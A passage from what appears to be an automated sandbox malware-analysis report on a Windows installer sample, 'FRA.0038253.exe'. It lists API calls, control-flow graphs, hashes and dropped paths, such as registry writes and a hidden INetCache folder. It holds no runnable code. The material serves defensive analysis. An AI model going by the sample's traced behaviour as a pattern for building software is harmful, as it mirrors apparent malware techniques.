                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: CloseEnum$DeleteValue
                                                                          • String ID:
                                                                          • API String ID: 1354259210-0
                                                                          • Opcode ID: 31db4fe3a83ab3222004bb99c88de970b8ea6707b57bc237e5c93fbc2d64a622
                                                                          • Instruction ID: f0574f2b681fe1c4d88f4d4805d4ce7f29dc2b98a501eac4c49c2c54c95910d6
                                                                          • Opcode Fuzzy Hash: 31db4fe3a83ab3222004bb99c88de970b8ea6707b57bc237e5c93fbc2d64a622
                                                                          • Instruction Fuzzy Hash: A5214872500108BBDF129F90CE89EEB7B6DEB04344F1004B6BA15B11A0E7B48F54AAA8
                                                                          Function 7075176B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 756 7075176b-707517a7 call 70751b28 760 707518c4-707518c6 756->760 761 707517ad-707517b1 756->761 762 707517b3-707517b9 call 7075233f 761->762 763 707517ba-707517c7 call 70752381 761->763 762->763 768 707517f7-707517fe 763->768 769 707517c9-707517ce 763->769 770 70751800-7075181c call 70752568 call 707515e9 call 707512f6 GlobalFree 768->770 771 7075181e-70751822 768->771 772 707517d0-707517d1 769->772 773 707517e9-707517ec 769->773 797 70751873-70751877 770->797 774 70751824-7075186a call 707515fb call 70752568 771->774 775 7075186c-70751872 call 70752568 771->775 778 707517d3-707517d4 772->778 779 707517d9-707517da call 70752ac8 772->779 773->768 776 707517ee-707517ef call 70752d53 773->776 774->797 775->797 791 707517f4 776->791 780 707517d6-707517d7 778->780 781 707517e1-707517e7 call 70752742 778->781 788 707517df 779->788 780->768 780->779 796 707517f6 781->796 788->791 791->796 796->768 800 707518b4-707518bb 797->800 801 70751879-70751887 call 7075252e 797->801 800->760 803 707518bd-707518be GlobalFree 800->803 806 7075189f-707518a6 801->806 807 70751889-7075188c 801->807 803->760 806->800 809 707518a8-707518b3 call 70751572 806->809 807->806 808 7075188e-70751896 807->808 808->806 810 70751898-70751899 FreeLibrary 808->810 809->800 810->806
                                                                          APIs
                                                                            • Part of subcall function 70751B28: GlobalFree.KERNEL32(?), ref: 70751D99
                                                                            • Part of subcall function 70751B28: GlobalFree.KERNEL32(?), ref: 70751D9E
                                                                            • Part of subcall function 70751B28: GlobalFree.KERNEL32(?), ref: 70751DA3
                                                                          • GlobalFree.KERNEL32(00000000), ref: 70751816
                                                                          • FreeLibrary.KERNEL32(?), ref: 70751899
                                                                          • GlobalFree.KERNEL32(00000000), ref: 707518BE
                                                                            • Part of subcall function 7075233F: GlobalAlloc.KERNEL32(00000040,?), ref: 70752370
                                                                            • Part of subcall function 70752742: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,707517E7,00000000), ref: 70752812
                                                                            • Part of subcall function 707515FB: wsprintfA.USER32 ref: 70751629
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2702525007.0000000070751000.00000020.00000001.01000000.00000006.sdmp, Offset: 70750000, based on PE: true
                                                                          • Associated: 00000000.00000002.2702483320.0000000070750000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2702568520.0000000070754000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2702605900.0000000070756000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_70750000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: Global$Free$Alloc$Librarywsprintf
                                                                          • String ID:
                                                                          • API String ID: 3962662361-3916222277
                                                                          • Opcode ID: ddc6b0eea096e9d469c4521eee5a315353d76d3f5762b57e04c546e3a9d8e62e
                                                                          • Instruction ID: bdbe7cdbab139ad1cdf1b884b38c62fc58da13ba052572607e9c7002476f4172
                                                                          • Opcode Fuzzy Hash: ddc6b0eea096e9d469c4521eee5a315353d76d3f5762b57e04c546e3a9d8e62e
                                                                          • Instruction Fuzzy Hash: C7418072500205DACB019F74CD89BDE37ACBF05326F148569F90B9B296EB74A94EC7A0
                                                                          Function 004024A3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 813 4024a3-4024d4 call 402c5e * 2 call 402cee 820 402aea-402af9 813->820 821 4024da-4024e4 813->821 822 4024f4-4024f7 821->822 823 4024e6-4024f3 call 402c5e lstrlenA 821->823 826 4024f9-40250d call 402c3c 822->826 827 40250e-402511 822->827 823->822 826->827 831 402522-402536 RegSetValueExA 827->831 832 402513-40251d call 403168 827->832 834 402538 831->834 835 40253b-402618 RegCloseKey 831->835 832->831 834->835 835->820
                                                                          APIs
                                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nspA3DD.tmp,00000023,00000011,00000002), ref: 004024EE
                                                                          • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nspA3DD.tmp,00000000,00000011,00000002), ref: 0040252E
                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nspA3DD.tmp,00000000,00000011,00000002), ref: 00402612
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: CloseValuelstrlen
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp
                                                                          • API String ID: 2655323295-539870142
                                                                          • Opcode ID: 46bd0e0c61603c21a4cacf55962a8e2b7a480c7a1e5d6b65af2c14969770193a
                                                                          • Instruction ID: ba6993148cc3675d547aa822e1716b3d1b24c23b5f2c72e501fb75f157281275
                                                                          • Opcode Fuzzy Hash: 46bd0e0c61603c21a4cacf55962a8e2b7a480c7a1e5d6b65af2c14969770193a
                                                                          • Instruction Fuzzy Hash: 99118E71A04218BFEF10AFA5DE49AAE7A74EB44314F21443FF505F71D1CAB98D829A18
                                                                          Function 00405E19 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 838 405e19-405e23 839 405e24-405e4f GetTickCount GetTempFileNameA 838->839 840 405e51-405e53 839->840 841 405e5e-405e60 839->841 840->839 842 405e55 840->842 843 405e58-405e5b 841->843 842->843
                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 00405E2D
                                                                          • GetTempFileNameA.KERNELBASE(0000000C,?,00000000,?,?,004033A0,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040367F,?,00000008), ref: 00405E47
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: CountFileNameTempTick
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                          • API String ID: 1716503409-3756726018
                                                                          • Opcode ID: 785ee4e59b25deabe338fa9c65985dff7b7c4930a860df7800de2eab11a71ed7
                                                                          • Instruction ID: 14d078e11d0d982709f1474591405d9e4ec12dd569452f15ee41c9613e6b5943
                                                                          • Opcode Fuzzy Hash: 785ee4e59b25deabe338fa9c65985dff7b7c4930a860df7800de2eab11a71ed7
                                                                          • Instruction Fuzzy Hash: B9F0A7363482047BDB109F55EC04B9B7B9CDF91B50F10C03BFA84DB180D6B1DA558798
                                                                          Function 004020CA Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020F5
                                                                            • Part of subcall function 0040539B: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00000000,004178D8,00000000,?,?,?,?,?,?,?,?,?,00403298,00000000,?), ref: 004053D4
                                                                            • Part of subcall function 0040539B: lstrlenA.KERNEL32(00403298,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00000000,004178D8,00000000,?,?,?,?,?,?,?,?,?,00403298,00000000), ref: 004053E4
                                                                            • Part of subcall function 0040539B: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00403298,00403298,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00000000,004178D8,00000000), ref: 004053F7
                                                                            • Part of subcall function 0040539B: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll), ref: 00405409
                                                                            • Part of subcall function 0040539B: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040542F
                                                                            • Part of subcall function 0040539B: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405449
                                                                            • Part of subcall function 0040539B: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405457
                                                                          • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402105
                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00402115
                                                                          • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040217F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                          • String ID:
                                                                          • API String ID: 2987980305-0
                                                                          • Opcode ID: 0fd346679bc9e9d3861b3065050ccbc3427d4690c7435472635ba0aed2cf982c
                                                                          • Instruction ID: 5ccb39c5250578943a79f1b53d37ee95c19345989512242465d2bde015d905a0
                                                                          • Opcode Fuzzy Hash: 0fd346679bc9e9d3861b3065050ccbc3427d4690c7435472635ba0aed2cf982c
                                                                          • Instruction Fuzzy Hash: 9621DB31A04115ABCF10BF649F89B6F7560AF40358F20413BF611B61D1CBBD4A839A5E
                                                                          Function 004015E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00405C82: CharNextA.USER32(?,?,00421D28,0000000C,00405CEE,00421D28,00421D28,77673410,?,C:\Users\user\AppData\Local\Temp\,00405A39,?,77673410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FRA.0038253.exe"), ref: 00405C90
                                                                            • Part of subcall function 00405C82: CharNextA.USER32(00000000), ref: 00405C95
                                                                            • Part of subcall function 00405C82: CharNextA.USER32(00000000), ref: 00405CA9
                                                                          • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401632
                                                                            • Part of subcall function 00405861: CreateDirectoryA.KERNELBASE(?,?), ref: 004058A3
                                                                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\mars\universaltang\reseek,00000000,00000000,000000F0), ref: 00401661
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\mars\universaltang\reseek, xrefs: 00401656
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                          • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\mars\universaltang\reseek
                                                                          • API String ID: 1892508949-2569430447
                                                                          • Opcode ID: 240596af62780b016a2c291bc3cd43714dde347e6640c115da9183df2a0f954e
                                                                          • Instruction ID: b9d7f2a528ebbf0421696501bc99c237113afa9c2e1b2d1ef7ca51e36b730b78
                                                                          • Opcode Fuzzy Hash: 240596af62780b016a2c291bc3cd43714dde347e6640c115da9183df2a0f954e
                                                                          • Instruction Fuzzy Hash: FA1101329082509FDF307B754C40A7F26B0DA56724B28493FE891B22E2C63D49439A6F
                                                                          Function 0040613E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,Call,?,?,?,?,00000000,?,?,004063FC,80000002), ref: 00406184
                                                                          • RegCloseKey.KERNELBASE(?,?,004063FC,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll), ref: 0040618F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: CloseQueryValue
                                                                          • String ID: Call
                                                                          • API String ID: 3356406503-1824292864
                                                                          • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                          • Instruction ID: 76517841fcd29efece62e5e1a2c360dd076a242d2a9727e46a6747b1579fdab2
                                                                          • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                          • Instruction Fuzzy Hash: 8F017C72500209ABDF22CF61CC09FDB3FACEF55364F05803AF956A6192D278D964DBA4
                                                                          Function 00406DA8 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 52e8e2f3ce7e58861e3a9609dfd3be968039f25556014777c8211dd210a242af
                                                                          • Instruction ID: 1ba8b0946190cfca9a38bcf883684fa235a04e0036d55360606e0058eb2854ca
                                                                          • Opcode Fuzzy Hash: 52e8e2f3ce7e58861e3a9609dfd3be968039f25556014777c8211dd210a242af
                                                                          • Instruction Fuzzy Hash: 1FA13471E04229CBDF28CFA8C8446ADBBB1FF44305F14856ED856BB281C7786A86DF45
                                                                          Function 00406FA9 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c677c486f466f484dfd1c99a1f2a245873954f2e4b245026a24d949c7f6f3191
                                                                          • Instruction ID: 4cec582b37938f4b46738944cdb824cb06d71243b33ce538cb970dd9eb120cbf
                                                                          • Opcode Fuzzy Hash: c677c486f466f484dfd1c99a1f2a245873954f2e4b245026a24d949c7f6f3191
                                                                          • Instruction Fuzzy Hash: 77912171D04229CBDF28CF98C8547ADBBB1FF44305F15816AD852BB281C778AA86DF45
                                                                          Function 00406CBF Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f7017ffa2fb89c7c88e3826070b7eff1c0c395dfa799b7d2f8b26d373e5a7aac
                                                                          • Instruction ID: c994caec5b11b43cd8bfb229e37972b73370650d0605b95137bc3c7ba8e8cbd0
                                                                          • Opcode Fuzzy Hash: f7017ffa2fb89c7c88e3826070b7eff1c0c395dfa799b7d2f8b26d373e5a7aac
                                                                          • Instruction Fuzzy Hash: 5B815671D04228CFDF24CFA8C844BADBBB1FB44305F25816AD456BB281C7789A86DF55
                                                                          Function 004067C4 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 467ea6f109ebfe7df444445d5d68d10c0908700de305c557aa58fc4ba5bc9dd0
                                                                          • Instruction ID: 83ed19ad7220401b24cbb632890786383754a2eaa69b063f1d72ccfd87ba6d35
                                                                          • Opcode Fuzzy Hash: 467ea6f109ebfe7df444445d5d68d10c0908700de305c557aa58fc4ba5bc9dd0
                                                                          • Instruction Fuzzy Hash: 4D817671D04229DBDF24CFA8C844BADBBB1FB44305F20816AD856BB2C1C7786A86DF45
                                                                          Function 00406C12 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
